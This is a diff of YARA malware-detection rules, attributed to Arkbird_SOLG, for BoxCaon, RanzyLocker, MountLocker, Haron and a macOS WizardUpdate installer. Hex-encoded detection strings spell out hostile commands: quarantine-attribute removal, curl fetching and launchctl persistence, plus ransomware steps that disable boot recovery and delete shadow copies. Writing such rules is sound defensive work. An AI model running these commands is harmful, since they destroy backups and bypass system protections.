+		$s4 = { 8b 45 08 33 ff 89 85 60 f1 ff ff 89 bd 5c f1 ff ff 33 c0 be 06 02 00 00 89 7d fc 56 66 89 85 88 fb ff ff 8d 85 8a fb ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 80 f9 ff ff 8d 85 82 f9 ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee bb 04 01 00 00 53 8d 85 88 fb ff ff 50 8d 45 e0 50 ff 15 00 d0 40 00 8d 85 80 f9 ff ff 50 53 ff 15 2c d0 40 00 6a 25 58 6a 73 5b 6a 63 66 89 45 c0 8b c3 66 89 45 c2 58 6a 63 66 89 45 c4 8b c3 66 89 45 c6 58 6a 6f 66 89 45 c8 58 6a 64 66 89 45 ca 58 6a 65 66 89 45 cc 58 66 89 45 ce 6a 25 58 6a 64 66 89 45 d0 58 6a 2e 66 89 45 d2 58 6a 6c 66 89 45 d4 58 6a 6f 66 89 45 d6 58 6a 67 66 89 45 d8 58 66 89 45 da 33 c0 68 fe 07 00 00 66 89 45 dc 66 89 85 80 f1 ff ff 8d 85 82 f1 ff ff 57 50 e8 [2] 00 00 33 c0 56 66 89 85 90 fd ff ff 8d 85 92 fd ff ff 57 50 e8 [2] 00 00 83 c4 18 6a 25 58 6a 20 66 89 45 98 8b c3 66 89 45 9a 58 6a 2f 8b c8 66 89 4d 9c 59 6a 41 66 89 4d 9e 59 6a 2f 66 89 4d a0 8b c8 66 89 4d a2 59 6a 43 66 89 4d a4 59 66 89 4d a6 6a 22 8b c8 66 89 4d a8 59 6a 25 66 89 4d aa 59 66 89 4d ac 6a 22 8b cb 66 89 4d ae 59 66 89 4d b0 8b c8 6a 3e 66 89 4d b2 59 66 89 45 b6 6a 25 58 66 89 45 b8 33 c0 66 89 4d b4 66 89 5d ba 66 89 45 bc ff 15 30 d0 40 00 8b 35 44 d1 40 00 50 8d 85 80 f9 ff ff 50 8d 45 c0 50 8d 85 90 fd ff ff 50 ff d6 8b 45 0c 83 c4 10 83 7d 20 08 73 03 8d 45 0c 8d 8d 90 fd ff ff 51 50 8d 85 88 fb ff ff 50 8d 45 98 50 8d 85 80 f1 ff ff 50 ff d6 6a 44 5e 56 8d 85 04 f1 ff ff 57 50 e8 [2] 00 00 6a 10 8d 85 48 f1 ff ff 57 50 89 b5 04 f1 ff ff e8 [2] 00 00 83 c4 2c 8d 85 04 f1 ff ff 50 ff 15 28 d0 40 00 33 c0 66 89 85 34 f1 ff ff 8d 85 48 f1 ff ff 50 8d 85 04 f1 ff ff 50 57 57 6a 10 57 57 57 8d 85 80 f1 ff ff 33 db 50 43 57 89 9d 30 f1 ff ff ff 15 08 d0 40 00 68 3f 77 1b 00 ff b5 48 f1 ff ff 8b f0 ff 15 0c d0 40 00 3b f7 0f 84 1c 01 00 00 ff b5 4c f1 ff ff 8b 35 34 d0 40 00 ff d6 ff b5 48 f1 ff ff ff d6 33 c0 c7 85 78 f1 ff ff 07 00 00 00 89 bd 74 f1 ff ff 66 89 85 64 f1 ff ff 57 57 6a 03 57 57 68 00 00 00 80 8d 85 90 fd ff ff 50 88 5d fc ff 15 24 d0 40 00 89 85 5c f1 ff ff 83 f8 ff 0f 84 96 00 00 00 57 50 ff 15 04 d0 40 00 89 85 58 f1 ff ff 83 f8 ff 75 2b ff b5 5c f1 ff ff ff d6 8b 85 60 f1 ff ff 68 64 f1 40 00 e8 f1 00 00 00 53 33 ff 8d b5 64 f1 ff ff e8 64 03 00 00 e9 95 00 00 00 83 c0 02 50 e8 [2] 00 00 8b d8 8b 85 58 f1 ff ff 83 c0 02 50 57 53 e8 [2] 00 00 83 c4 10 57 8d 85 58 f1 ff ff 50 ff b5 58 f1 ff ff 53 ff b5 5c f1 ff ff ff 15 20 d0 40 00 ff b5 5c f1 ff ff ff d6 8d 85 64 f1 ff ff 50 53 e8 d9 11 00 00 53 e8 [2] 00 00 83 c4 0c 8d 85 90 fd ff ff 50 ff 15 38 d0 40 00 8b b5 60 f1 ff ff 8d 9d 64 f1 ff ff e8 96 00 00 00 6a 01 33 ff 8b }
+		$s5 = { be 06 02 00 00 89 ?? fc 56 66 89 85 ?? fb ff ff 8d 85 ?? fb ff ff ?? 50 e8 [2] 00 00 33 c0 56 66 89 85 ?? f9 ff ff 8d 85 ?? f9 ff ff ?? 50 e8 [2] 00 00 83 c4 18 6a 43 58 6a 6f 66 89 45 e0 58 6a 6d 66 89 45 e2 58 6a 53 66 89 45 e4 58 6a 70 66 89 45 e6 58 6a 65 66 89 45 e8 58 6a 63 66 89 45 ea 58 66 89 45 ec 33 c0 66 89 45 ee ?? 04 01 00 00 ?? 8d 85 ?? fb ff ff 50 8d 45 e0 50 ff 15 00 [2] 00 8d 85 ?? f9 ff ff 50 ?? ff 15 [3] 00 }
+		$s6 = { 8b 45 08 [5] ff [5] 6a 07 89 85 10 ff ff ff ?? 33 ?? 33 c0 89 ?? 14 89 ?? 10 89 ?? 18 ff ff ff 66 89 ?? 8d ?? 1c 89 ?? fc 89 ?? 14 89 ?? 10 66 89 ?? 8d ?? 38 89 ?? 14 89 ?? 10 89 ?? 0c ff ff ff 66 89 ?? 89 ?? 6c 89 ?? 68 66 89 ?? 58 89 ?? 88 00 00 00 89 ?? 84 00 00 00 66 89 ?? 74 89 ?? b8 00 00 00 89 ?? b4 00 00 00 66 89 ?? a4 00 00 00 6a 68 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $str* ) and 2 of ( $seq* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_Mal_Boxcaon_Jul_2021_1 : FILE
 {
 	meta:
-		description = "Detect WizardUpdate installer on OSX system"
+		description = "Detect the BoxCaon malware"
 		author = "Arkbird_SOLG"
-		id = "50974725-6b45-5f2f-aa76-ae73dc752873"
-		date = "2021-10-22"
-		modified = "2021-10-23"
-		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_1.yara#L1-L21"
+		id = "5f456b73-02f9-5dd7-973e-bde20dcddd27"
+		date = "2021-07-01"
+		modified = "2021-07-02"
+		reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_BoxCaon_Jul_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "b25145a9aa33c9518e5e0847b50faa8b67d65078ddfbb66de49196a17ddd3137"
+		logic_hash = "c7dfce8d7a451817a80897d5cb02cec5aba52f86ece0286353865b7d391e2ffc"
 		score = 75
-		quality = 75
+		quality = 46
 		tags = "FILE"
-		hash1 = "939cebc99a50989ffbdbb2a6727b914fc9b2382589b4075a9fd3857e99a8c92a3"
-		hash2 = "c5017798275f054ae96c69f5dd0b378924c6504a70c399279bbf7f33d990d45b"
-		hash3 = "7067e6a69a8f5fdbabfb00d03320cfc2f3584a83304cbeeca7e8edc3d57bbbd4"
+		hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b"
+		hash2 = "d0b88ab321a05fc94505620c9d02baec4cb1de7bb3b0067de4f8c0d3ba8548b2"
 		tlp = "White"
-		adversary = "-"
+		adversary = "IndigoZebra"
 
 	strings:
-		$s1 = { 48 89 e5 48 83 ec 70 48 89 7d f0 48 c7 45 e0 00 00 00 00 b8 01 00 00 00 48 89 c7 48 89 c6 e8 b8 3b 00 00 31 c9 89 cf 48 89 45 d8 48 c7 45 d0 00 00 00 00 e8 a9 3b 00 00 48 8b 7d f0 48 8d 35 d4 3f 00 00 89 45 cc e8 ba 3b 00 00 48 89 45 e8 48 83 7d e8 00 0f 85 0d 00 00 00 48 c7 45 f8 00 00 00 00 e9 cd 00 00 00 e9 00 00 00 00 48 8b 55 e8 48 8d 7d e0 48 8d 75 d0 e8 70 3b 00 00 48 83 f8 ff 0f 84 9c 00 00 00 48 8b 7d d8 48 8b 45 d8 48 89 7d c0 48 89 c7 e8 76 3b 00 00 48 8b 7d e0 48 89 45 b8 e8 69 3b 00 00 48 8b 4d b8 48 01 c1 48 81 c1 01 00 00 00 48 8b 7d c0 48 89 ce e8 49 3b 00 00 48 89 45 d8 48 8b 45 d8 48 8b 7d d8 48 89 45 b0 e8 3a 3b 00 00 48 8b 4d b0 48 01 c1 48 8b 75 e0 48 8b 7d e0 48 89 4d a8 48 89 75 a0 e8 1e 3b 00 00 48 05 01 00 00 00 48 8b 7d a8 48 8b 75 a0 48 89 c2 e8 0e 3b 00 00 48 8b 7d e0 48 89 45 98 e8 d1 3a 00 00 48 c7 45 }
-		$s2 = { 48 89 e5 48 81 ec 80 01 00 00 48 89 f8 48 8b 0d 7b 31 00 00 48 8b 09 48 89 4d f8 48 89 bd e8 fe ff ff c6 85 e7 fe ff ff 00 48 89 bd b8 fe ff ff 48 89 b5 b0 fe ff ff 48 89 85 a8 fe ff ff e8 9c 01 00 00 c7 85 d4 fe ff ff 00 01 00 00 48 8d 35 0a 2e 00 00 48 8b bd b0 fe ff ff e8 df 28 00 00 e9 00 00 00 00 48 8b bd b0 fe ff ff e8 8e 01 00 00 48 8d 35 ec 2d 00 00 48 89 c7 e8 5b 29 00 00 48 89 85 a0 fe ff ff e9 00 00 00 00 48 8b 85 a0 fe ff ff 48 89 85 d8 fe ff ff 48 83 bd d8 fe ff ff 00 0f 84 c4 00 00 00 e9 00 00 00 00 48 8b bd d8 fe ff ff e8 04 29 00 00 89 85 9c fe ff ff e9 00 00 00 00 8b 85 9c fe ff ff 83 f8 00 0f 95 c1 80 f1 ff f6 c1 01 0f 85 05 00 00 00 e9 75 00 00 00 48 8b 95 d8 fe ff ff 48 8d bd f0 fe ff ff be 00 01 00 00 e8 ca 28 00 00 48 89 85 90 fe ff ff e9 00 00 00 00 48 8b 85 90 fe ff ff 48 83 f8 00 0f 84 3b 00 00 00 48 8d b5 f0 fe ff ff 48 8b bd b8 fe ff ff }
-		$s3 = "11101000010110101110100011010010110110101100101011011110111010101110100001000000011100100110000001100000010000000101101010011000010000000100010011010000111010001110100011100000111001100111010001011110010111101101101"
-		$s4 = { 48 8b bd d8 fe ff ff e8 73 28 00 00 e9 00 00 00 00 e9 00 00 00 00 c6 85 e7 fe ff ff 01 f6 85 e7 fe ff ff 01 0f 85 0c 00 00 00 48 8b bd b8 fe ff ff e8 cb 27 00 00 48 8b 05 fc 2f 00 00 48 8b 00 48 8b 4d f8 48 39 c8 0f 85 32 00 00 00 48 8b 85 a8 fe ff ff 48 81 c4 80 01 00 }
+		$s1 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 61 75 74 6f 72 65 6e 61 6d 65 22 3a 20 66 61 6c 73 65 7d }
+		$s2 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 72 65 63 75 72 73 69 76 65 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 65 64 69 61 5f 69 6e 66 6f 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 64 65 6c 65 74 65 64 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 68 61 73 5f 65 78 70 6c 69 63 69 74 5f 73 68 61 72 65 64 5f 6d 65 6d 62 65 72 73 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 6f 75 6e 74 65 64 5f 66 6f 6c 64 65 72 73 22 3a 20 74 72 75 65 2c 22 69 6e 63 6c 75 64 65 5f 6e 6f 6e 5f 64 6f 77 6e 6c 6f 61 64 61 62 6c 65 5f 66 69 6c 65 73 22 3a 20 74 72 75 65 7d }
+		$s3 = "api.dropboxapi.com" fullword ascii
+		$s4 = { 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 00 00 00 22 00 00 00 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 20 3a 20 22 00 00 0d 00 0a 00 44 00 72 00 6f 00 70 00 62 00 6f 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 3a 00 20 00 7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 20 00 22 00 00 00 22 00 7d 00 0d 00 0a 00 00 00 00 00 7b 22 65 72 72 6f 72 5f 73 75 6d 6d 61 72 79 22 00 00 00 00 25 00 73 00 5c 00 25 00 73 00 00 00 7b 22 70 61 74 68 22 3a 20 22 25 73 22 }
+		$s5 = "C:\\Users\\Public\\%d\\" fullword ascii
+		$s6 = { 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 20 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 2c 00 22 00 61 00 75 00 74 00 6f 00 72 00 65 00 6e 00 61 00 6d 00 65 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 22 00 6d 00 75 00 74 00 65 00 22 00 3a 00 20 00 74 00 72 00 75 00 65 00 2c 00 22 00 73 00 74 00 72 00 69 00 63 00 74 00 5f 00 63 00 6f 00 6e 00 66 00 6c 00 69 00 63 00 74 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 7d 00 0d 00 0a 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00 69 00 6f 00 6e 00 2f 00 6f 00 63 00 74 00 65 00 74 00 2d 00 73 00 74 00 72 00 65 00 61 00 6d }
+		$s7 = { 25 73 2f [1-4] 2e 74 78 74 }
+		$s8 = { 25 73 2f [1-4] 2d 25 30 34 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 25 30 32 64 2e 74 78 74 }
 
 	condition:
-		uint32( 0 ) == 0xFEEDFACF and filesize > 50KB and ( ( $s1 and $s3 ) or ( $s2 and $s4 ) )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_2 : FILE
+rule ARKBIRD_SOLG_Ran_Ranzylocker_Hunting_Mar_2021_1 : FILE
 {
 	meta:
-		description = "Detect a structure like the bash of WizardUpdate installer on OSX system"
+		description = "Detect RanzyLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "3e48c2fa-10f4-5152-90e6-f5f8cc507103"
-		date = "2021-10-22"
-		modified = "2021-10-23"
-		reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_2.yara#L1-L20"
+		id = "0d0c743b-9beb-5413-b5ba-dad75c2ee0b7"
+		date = "2021-03-16"
+		modified = "2021-03-17"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-16/RanzyLocker/Ran_RanzyLocker_Hunting_Mar_2021_1.yar#L1-L24"
 		license_url = "N/A"
-		logic_hash = "99d3323e3c155be040fef3beea0a55aec9bd3178df822d5fd6530864186446ed"
-		score = 75
-		quality = 67
+		logic_hash = "ec7867e40e4418bb662c8cf5a71566cd261d2040ee5d3afa0bbe2b92ebfef98e"
+		score = 50
+		quality = 53
 		tags = "FILE"
-		hash1 = "eafacc44666901a5ea3c81a128e5dd88d0968a400d74ef1da5c2c05dc6dd7a39"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "5d0af3bf0dc7d99fc87d844a0fcd99796b9257ba02d78510422c498d445f0d0d"
 
 	strings:
-		$s1 = { 24 28 65 76 61 6c 20 65 63 68 6f 20 7e 24 28 65 63 68 6f 20 24 55 53 45 52 29 29 }
-		$s2 = { 69 66 20 5b 20 21 20 2d 66 20 22 24 [5-15] 22 20 5d 3b 20 74 68 65 6e }
-		$s3 = { 63 75 72 6c 20 2d 2d 72 65 74 72 79 20 [2-3] 2d 66 20 22 }
-		$s4 = { 78 61 74 74 72 20 2d 72 20 2d 64 20 63 6f 6d 2e 61 70 70 6c 65 2e 71 75 61 72 61 6e 74 69 6e 65 }
-		$s5 = { 6c 61 75 6e 63 68 63 74 6c 20 6c 6f 61 64 20 2d 77 }
-		$s6 = { 63 68 6f 77 6e 20 2d 52 20 24 55 53 45 52 }
-		$s7 = { 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 20 65 6e 63 6f 64 69 6e 67 3d 5c 22 55 54 46 2d 38 5c 22 3f 3e 0a 09 3c 21 44 4f 43 54 59 50 45 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 5c 22 2d 2f 2f 41 70 70 6c 65 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f 2f 45 4e 5c 22 20 5c 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 70 6c 65 2e 63 6f 6d 2f 44 54 44 73 2f 50 72 6f 70 65 72 74 79 4c 69 73 74 2d 31 2e 30 2e 64 74 64 5c 22 3e 0a 09 3c 70 6c 69 73 74 20 76 65 72 73 69 6f 6e 3d 5c 22 31 2e 30 5c 22 3e }
+		$s1 = "-nolan" fullword wide
+		$s2 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 32 30 32 38 37 38 33 38 33 36 32 39 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
+		$s3 = { 34 33 33 41 35 43 35 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 34 36 36 39 36 43 36 35 37 33 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 32 30 35 33 35 31 34 43 32 30 35 33 36 35 37 32 37 36 36 35 37 32 }
+		$s4 = { 32 32 37 33 37 35 36 32 36 39 36 34 32 32 33 41 32 32 00 00 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
+		$s5 = { 32 32 36 43 36 31 36 45 36 37 32 32 33 41 32 32 }
+		$s6 = { 32 32 36 35 37 38 37 34 32 32 33 41 32 32 }
+		$s7 = { 32 32 36 42 36 35 37 39 32 32 33 41 32 32 }
+		$s8 = { 32 32 36 45 36 35 37 34 37 37 36 46 37 32 36 42 32 32 33 41 32 32 }
+		$s9 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 36 32 36 46 36 46 37 34 37 33 37 34 36 31 37 34 37 35 37 33 37 30 36 46 36 43 36 39 36 33 37 39 32 30 36 39 36 37 36 45 36 46 37 32 36 35 36 31 36 43 36 43 36 36 36 31 36 39 36 43 37 35 37 32 36 35 37 33 }
+		$s10 = { 36 32 36 33 36 34 36 35 36 34 36 39 37 34 32 45 36 35 37 38 36 35 32 30 32 46 37 33 36 35 37 34 32 30 37 42 36 34 36 35 36 36 36 31 37 35 36 43 37 34 37 44 32 30 37 32 36 35 36 33 36 46 37 36 36 35 37 32 37 39 36 35 36 45 36 31 36 32 36 43 36 35 36 34 32 30 34 45 36 46 }
+		$s11 = { 37 37 36 44 36 39 36 33 32 45 36 35 37 38 36 35 32 30 35 33 34 38 34 31 34 34 34 46 35 37 34 33 34 46 35 30 35 39 32 30 32 46 36 45 36 46 36 39 36 45 37 34 36 35 37 32 36 31 36 33 37 34 36 39 37 36 36 35 }
+		$s12 = { 35 33 34 46 34 36 35 34 35 37 34 31 35 32 34 35 35 43 34 44 36 39 36 33 37 32 36 46 37 33 36 46 36 36 37 34 35 43 34 35 35 32 34 39 34 34 }
+		$s13 = { 37 32 36 35 36 31 36 34 36 44 36 35 32 45 37 34 37 38 37 34 }
 
 	condition:
-		filesize > 2KB and 6 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 100KB and 10 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Haron_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Mountlocker_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect Haron locker"
+		description = "Detect the Mountlocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "5900ad0e-66ca-5127-b8c2-cc23ace8929f"
-		date = "2021-08-09"
-		modified = "2021-08-09"
+		id = "0bc0d341-4658-500e-b487-1993e5431560"
+		date = "2020-05-12"
+		modified = "2021-05-16"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-09/RAN_Haron_Aug_2021_1.yara#L1-L22"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-12/Astrolocker/RAN_MountLocker_May_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "5001041d9bb8acc0fa5e0e3b4cfacc5a891bed6885101ae3513b5524c91c572d"
+		logic_hash = "c0826d4c740b5c46b704b42e002602dd0cda2b6d1bf0ba5431877be8bd600b64"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2"
-		hash2 = "6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c"
-		tlp = "white"
-		adversary = "Haron"
+		hash1 = "0aa8099c5a65062ba4baec8274e1a0650ff36e757a91312e1755fded50a79d47"
+		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
+		hash3 = "5eae13527d4e39059025c3e56dad966cf67476fe7830090e40c14d0a4046adf0"
+		tlp = "White"
+		adversary = "MountLocker"
 
 	strings:
-		$s1 = { 02 17 8d ?? 00 00 01 [2] 16 20 [2] 00 00 20 00 ?? 00 00 [1-5] 73 [2] 01 00 0a a2 ?? 7d ?? 01 00 0a }
-		$s2 = { 03 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 }
-		$s3 = { 1f 38 16 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 13 07 7e ?? 01 00 0a 13 0b 11 07 11 0b 11 06 6e 1f 60 6a d7 88 20 00 30 00 00 1f 40 28 ?? 00 00 06 28 ?? 01 00 0a b8 13 08 11 07 02 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 28 ?? 01 00 0a b8 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 ?? 00 00 06 84 b8 13 09 11 07 02 7e }
-		$s4 = { 1f 18 02 28 ?? 01 00 0a 16 9a 6f ?? 01 00 0a b8 28 ?? 00 00 06 0a 7e ?? 01 00 0a 0b 06 07 28 ?? 01 00 0a 0c 08 2c 04 07 0d 2b 6f 12 04 fe 15 ?? 00 00 02 12 04 11 04 28 ?? 00 00 2b b8 7d ?? 00 00 04 06 12 04 28 ?? 00 00 06 0c 08 2c 4a 12 04 7c ?? 00 00 04 28 ?? 01 00 0a 20 ff ff ff 7f 6a fe 02 16 fe 01 13 05 11 05 2c 17 03 12 04 7b ?? 00 00 04 17 28 ?? 01 00 0a 16 fe 01 13 06 11 06 2d 0c 06 12 04 28 ?? 00 00 06 2d c2 2b 0a 12 04 7b ?? 00 00 04 0d 09 2a 07 0d 09 2a }
-		$s5 = { 28 0e 00 00 0a 0b 16 0c 38 84 01 00 00 07 08 9a 0a 06 6f ?? 01 00 0a 20 00 00 80 0c 6a 3e 66 01 00 00 06 6f 0d 00 00 0a 28 0c 00 00 0a 6f 0d 00 00 0a 28 21 00 00 0a 39 4c 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 2d 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 0e 01 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a ef 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a d0 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a b1 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 3a 92 00 00 00 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 76 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 5a 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 3e 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 22 06 6f 0d 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f 2e 00 00 0a 2d 06 06 6f 26 00 00 0a de 03 26 de 00 08 17 58 0c 08 07 8e 69 3f 73 fe ff ff 20 c4 09 00 00 28 18 00 00 0a dd 57 fe ff ff 26 dd 51 fe ff ff }
-		$s6 = { 7e ?? 00 00 0a 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 6f [2] 00 0a 0a 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 28 09 00 00 06 7e ?? 00 00 04 20 [2] 66 06 28 [2] 00 06 6f [2] 00 0a 06 6f ?? 00 00 0a de 03 26 de 00 2a }
-		$s7 = { 28 ?? 00 00 06 0a 02 06 28 ?? 00 00 06 0b 07 6f [2] 00 0a 16 16 17 20 ff 0f 1f 00 17 14 73 [2] 00 0a 16 14 73 [2] 00 0a 6f [2] 00 0a 02 06 07 28 ?? 00 00 06 de 03 26 de 00 2a 00 00 00 }
+		$seq_Sep_2020_1 = { 40 53 48 81 ec f0 02 00 00 b9 e8 03 00 00 ff 15 ec 1a 00 00 bb 68 00 00 00 48 8d 4c 24 70 44 8b c3 33 d2 e8 9c 00 00 00 ba 04 01 00 00 89 5c 24 70 48 8d 8c 24 e0 00 00 00 ff 15 51 1a 00 00 48 8d 15 a2 9c 00 00 48 8d 8c 24 e0 00 00 00 ff 15 64 1a 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 48 8d 94 24 e0 00 00 00 48 8d 44 24 70 45 33 c0 48 89 44 24 40 33 c9 48 83 64 24 38 00 48 83 64 24 30 00 c7 44 24 28 10 00 00 00 83 64 24 20 00 ff 15 c1 19 00 00 8b d8 85 c0 74 16 48 8b 4c 24 58 ff 15 50 1a 00 00 48 8b 4c 24 50 ff 15 45 1a 00 00 8b c3 48 81 c4 f0 02 }
+		$seq_Sep_2020_2 = { 68 00 00 00 f0 6a 01 68 a0 51 00 10 57 8d 45 f8 89 5d f4 50 89 7d f8 89 7d fc ff 15 30 50 00 10 85 c0 0f 84 81 00 00 00 8d 45 fc 50 57 57 68 14 01 00 00 68 d0 d0 00 10 ff 75 f8 ff 15 08 50 00 10 8b f0 85 f6 74 26 68 00 01 00 00 8d 45 f4 50 68 60 42 01 10 57 6a 01 57 ff 75 fc ff 15 04 50 00 10 ff 75 fc 8b f0 ff 15 00 50 00 10 57 ff 75 f8 ff 15 0c 50 00 10 }
+		$seq_Jan_2021_1 = { 48 21 4d 77 4c 8d 05 [2] 00 00 48 21 4d 6f ?? 8b ?? 48 8d 4d 77 [6-9] c7 44 24 20 00 00 00 f0 ff 15 [2] 00 00 85 c0 0f 84 [2] 00 00 48 8b 4d 77 48 8d 45 6f 48 89 44 24 28 48 8d [3] 00 00 83 64 24 20 00 [2-5] c9 41 b8 14 01 00 00 ff 15 [2] 00 00 8b d8 85 c0 74 3b 48 8b 4d 6f 48 8d 45 67 c7 44 24 30 00 01 00 00 45 33 c9 48 89 44 24 28 ?? 8b ?? 48 8d 05 [2-3] 00 33 d2 48 89 44 24 20 ff 15 [2] 00 00 48 8b 4d 6f 8b d8 ff 15 [2] 00 00 48 8b 4d 77 33 d2 ff 15 [2] 00 00 85 db [4-12] 00 00 48 8d }
